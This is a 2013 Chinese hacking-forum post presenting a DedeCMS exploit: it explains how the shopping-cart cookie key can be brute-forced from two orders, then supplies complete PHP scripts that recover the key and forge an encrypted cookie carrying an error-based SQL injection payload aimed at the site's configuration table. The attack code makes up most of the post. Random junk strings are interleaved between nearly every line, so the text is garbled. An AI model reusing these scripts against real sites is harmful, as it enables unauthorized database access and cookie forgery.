中国网络渗透测试联盟
标题:
织梦CMS漏洞dedecms漏洞SQL注入漏洞
[打印本页]
作者:
admin
时间:
2013-2-13 23:58
标题:
织梦CMS漏洞dedecms漏洞SQL注入漏洞
www.xxx.com/plus/search.php?keyword=
9 k) G, D% [" c/ T/ U
在 include/shopcar.class.php中
- Y! d$ W, A, }" m
先看一下这个shopcar类是如何生成cookie的
+ A" B# i# S6 _5 | ^
239 function saveCookie($key,$value)
0 c) d6 D& B: J# K
240 {
8 a! l% n( I) E( \, {; |
241 if(is_array($value))
9 b; g' ? V2 y: D. N/ B# q9 Q
242 {
( t2 |% B3 C* C9 u9 `* [: _- F2 D
243 $value = $this->enCrypt($this->enCode($value));
9 \ X) q" B+ ?+ K8 d l7 `" {
244 }
6 ?1 {; O g8 q7 i0 ~
245 else
- s; l5 W" O7 B- c
246 {
4 n- N B; ^+ F
247 $value = $this->enCrypt($value);
/ W# Q$ S1 f7 A. s4 b5 G
248 }
5 g0 ~7 W y9 h* m3 c( b7 s
249 setcookie($key,$value,time()+36000,’/');
, d- h- l; ^# b( F% B! P( P
250 }
$ o7 ]) K8 b3 D% T5 W
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
& q$ j# H, v, R
186 function enCrypt($txt)
: q: g$ W4 r1 R) S8 c
187 {
6 g5 ?; V3 V% S# T# ?$ C
188 srand((double)microtime() * 1000000);
+ k) g/ C% Q: Z8 o- S+ ~+ X) t
189 $encrypt_key = md5(rand(0, 32000));
+ d8 g$ ]6 E$ B" a, S; ?
190 $ctr = 0;
/ J- m" f( n, s* J! C/ v0 ^' Q+ N- Q
191 $tmp = ”;
* y# v- @$ E9 W$ Q3 I
192 for($i = 0; $i < strlen($txt); $i++)
- p/ ~4 j+ j# O F, d& s3 n
193 {
( g8 C. q- m# s) s
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
- P7 U" P- ^. K) O# |3 p9 u% ]
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
% _ g+ F& \5 m* h
196 }
5 P! s5 t: I" h w
197 return base64_encode($this->setKey($tmp));
. X W9 s% Y; Y$ U" _+ T# }8 ^
198 }
7 Z5 O y! ^! p# R4 Z3 \( r
213 function setKey($txt)
. O0 l9 e4 g: w' W
214 {
6 C+ p# K5 E1 X' h3 b: C
215 global $cfg_cookie_encode;
2 Q; \; V" V m% a) S6 Z
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
- u, P$ ~3 u% o# X
217 $ctr = 0;
. F: }0 S ]. d6 [" a1 l
218 $tmp = ”;
; i7 J, j) z4 I% ?# c% U" v p6 z
219 for($i = 0; $i < strlen($txt); $i++)
: C/ d- U0 g! f% N
220 {
2 L, Y4 o$ C4 p8 p" Q, G- w C3 N4 f
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
0 W o) q7 W$ _* [: b- w: |- e
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
! j2 z- c% d$ Z
223 }
) q5 F Y. H; V( `, u0 J
224 return $tmp;
; B2 Y/ p4 C# n8 p8 a
225 }
, ~9 M" [8 B, `7 \4 u
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
" x+ f) _& ^# m7 |$ N) W3 X
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
' d& V7 b; z6 U0 y8 p
具体代码如下:
) R1 N0 b0 D9 Y( R) |
<?php
: Z$ u& F9 s& M$ M4 } u# D
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
+ B, c7 @! Q F" T# ~
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
, h2 r |# w" O& V- P X: F8 k
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
% F- F2 f6 w. y1 A- j" G( P. _; Y
function reStrCode($code,$string)
2 x5 C: V* U6 |, V8 J# n
{
' s+ ?& F( X' n6 o; g: J; o
$code = base64_decode($code);
# C l% \- h- q( _( k3 p
$key = “”;
& b0 e+ Y7 H/ C% b; o
for($i=0 ; $i<32 ; $i++)
0 ? K$ j/ c/ y4 p
{
' |+ J4 R4 m3 r
$key .= $string[$i] ^ $code[$i];
] |: l1 C2 Z$ r( {
}
% |4 j6 ?: g% S* i! p# A e* ]
return $key;
, p# K. \6 M: ] u& c9 [, ?
}
+ @8 E4 l/ ~9 l
function getKeys($cookie,$plantxt)
7 L; W) O8 k/ U
{
9 s+ ` }) _ c; J
$tmp = $cookie;
, P/ P* U" O! G
$results = array();
G# E1 Y3 H" n( X! H/ R
for($j=0 ; $j < 32000; $j++)
- ]& o& n6 i' _& G K# U" W, n
{
0 Z6 M8 K0 Q) U1 [- @. O3 K o
9 b( u+ c6 Y) h: T
$txt = $plantxt;
% |1 g+ d$ e; q/ h# ~% G% ^4 \
$ctr = 0;
8 M5 i+ h9 V4 b6 ~
$tmp = ”;
+ t0 a" X+ {, f9 |$ }7 V8 N
$encrypt_key = md5($j);
- |. v ?" Q% ]! {+ ~. E
for($i =0; $i < strlen($txt); $i ++)
# }' j9 V1 ~* n/ S9 y
{
' R) t0 h' W3 w
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
3 F7 y4 z+ u6 V* H: ^ d6 V
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
5 n/ W# {& J% L
}
' w, @4 D3 q1 i( a# R( L
$string = $tmp;
4 P& n8 e7 n$ @, ]" c
$code = $cookie;
9 t" z! Y8 o2 x! c% T( @
$result = reStrCode($code,$string);
- Q$ l% Y* s0 X/ u
if(eregi(‘^[a-z0-9]+$’,$result))
# l' `+ V' T, T _
{
: C% {6 r" q5 A* E$ P
echo $result.”\n”;
+ `( K8 a# Q* J( m! W: z
$results[] = $result;
# Z( o' c, n2 \" u$ b
}
, D, P' v: j2 I6 n: ?7 ]8 k
}
; P0 S0 X" [ m5 ^: b
return $results;
- i; N9 F6 c0 |4 V' ^3 B
}
" U* T0 e* n6 A/ r; A
$results1 = getKeys($cookie1,$plantxt);
, h- N* _) w+ J& x0 Z+ w* V7 B- k
$results2 = getKeys($cookie2,$plantxt);
, j4 z( l+ D7 N/ v
print “\n——————–real key————————–\n”;
6 F. e, S1 \7 p o
foreach($results1 as $test1)
% e4 f) y" A" Q1 G
{
# _* R. y( l# M. o: `, S" [
foreach($results2 as $test2)
% ~' C0 A4 N7 R* K& [% k8 `
{
' U4 x5 ]/ h5 f. J& c- o, Z% ?
if($test1 == $test2)
1 c) q/ n) n0 F
{
/ ^/ O8 c: ?8 ^3 o7 H1 v$ U* Q( g z g
echo $test1.”\n”;
( q! R" z2 Y% z
}
1 a( e, a2 A6 e
}
2 i# G: c. }$ v9 k( G
}
) A" q8 V+ @2 ^- n0 x! f
?>
6 s2 k4 W4 m- ?! s; D
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
+ O# x$ ?0 ~1 Z9 }- p4 f. n
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
) F) `5 F: I4 T- i3 Z
然后推算出md5(strtolower($cfg_cookie_encode))
2 r1 g# _) P, r* f4 m7 v
得到这个key之后,我们就可以构造任意购物车的cookie
3 m, U2 g- | ~& N4 m( y7 `- C
接着看
' A1 @; F, W% E8 k- d, N1 p
20 class MemberShops
* p+ [6 f' Y3 e+ P9 C6 Y) z: n3 k
21 {
# A$ J; ` N4 E" Q' M; i8 N7 b& d* Y
22 var $OrdersId;
7 q; S! S+ v9 Z- m( P( U
23 var $productsId;
* L8 s3 m: @4 E/ p" ]% a* Q
24
: \$ J3 x( I% f3 d8 q2 X
25 function __construct()
; \) q+ y" e J+ p" m t
26 {
5 E6 p3 V% c6 D- h0 t: q: P
27 $this->OrdersId = $this->getCookie(“OrdersId”);
/ {1 Q. E5 L- W8 q% ^% g$ Q
28 if(empty($this->OrdersId))
0 ?1 b# z8 b& N+ N1 V
29 {
: |2 ~' J/ |/ T
30 $this->OrdersId = $this->MakeOrders();
% S. @0 X8 Y' N l7 w) h
31 }
Y! r$ k" a+ O& a$ ^% Z
32 }
8 K0 s1 l7 n4 ~3 m7 l2 I8 R
发现OrderId是从cookie里面获取的
% h6 n7 B& Y1 l% z
然后
( S% @9 b& N, ]6 Q
/plus/carbuyaction.php中的
) _. @0 d( A, e, L
29 $cart = new MemberShops();
; g6 r) x+ ~: T+ P5 g4 D
39 $OrdersId = $cart->OrdersId; //本次记录的订单号
1 D2 G+ _7 N. o* W+ X% } ?$ q
……
# O" A" ^; G4 [! }
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
5 G! W: C% P0 {+ o& u6 t
接着我们就可以注入了
; W$ p: x+ S5 R& q1 Q/ V; r6 {
通过利用下面代码生成cookie:
. R- d3 x; u) [
<?php
3 t; x) U! i$ ]4 k, E; V+ q) L
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
! D- c; G8 @$ S% C
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
# I$ \+ a: ^& V, D
function setKey($txt)
* A( g7 F$ P/ N0 X0 B3 m
{
8 w$ b3 Q: M: O
global $encrypt_key;
% ~- K+ n3 s6 z; d* o/ Y
$ctr = 0;
9 g! V5 O+ [* v- S; a
$tmp = ”;
8 n, W! c5 A; s2 F$ ~1 }+ r
for($i = 0; $i < strlen($txt); $i++)
7 I# N, ^5 I- [, P1 R: d% F7 _
{
5 G( |9 ~+ n2 F* J
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
) i, o: A5 K% j( z- G1 F
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
2 U8 T3 O( a: U4 g8 \
}
2 M" E. B2 k8 e f3 I4 x
return $tmp;
- g: `1 S# q5 d* g
}
: x$ R/ g: Y$ ]7 U/ c
function enCrypt($txt)
$ o R# z# a! m5 W7 h+ O! w
{
4 R# N# N0 u# D; _* p5 \* D7 v) R# u5 k
srand((double)microtime() * 1000000);
2 s$ v- t; n& E
$encrypt_key = md5(rand(0, 32000));
1 e0 F" v; q8 J' n
$ctr = 0;
& s7 m+ |9 |! m6 w
$tmp = ”;
f5 g" j0 {5 @' @' q9 z. J2 u% n( D
for($i = 0; $i < strlen($txt); $i++)
9 c4 o) E0 ~$ J% s
{
4 t# p r/ \; w; i; F# u. O
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
* H6 i" A5 h" \% n' E7 P$ Q. ^/ l5 R( n
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
) P' J1 \1 u1 K4 x. |
}
0 C& a& F* r. b
return base64_encode(setKey($tmp));
* z# t) d+ @! m, U
}
4 k2 z, L! M+ O j0 f; m- R- y
for($dest =0;$dest = enCrypt($txt);)
. f# G2 {2 h0 J) t, M
{
Y+ _$ z M) c- P3 r
if(!strpos($dest,’+'))
/ |9 }( [& f6 i7 `3 y% a5 w5 R9 _
{
1 Y% L; g6 n8 l+ g4 @, a& Y
break;
1 T7 c- @, ?6 w; O5 h! |% W0 x" b
}
) n L0 ]7 m7 O6 ~. P
}
: E( N s1 c9 F7 E' ~9 N
echo $dest.”\n”;
, t( `: C; j9 P3 y! b7 G5 Z( M
?>
& C& w; b/ j8 [1 d/ U; W
1 O; @; n; K; K* p' s0 P& @
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2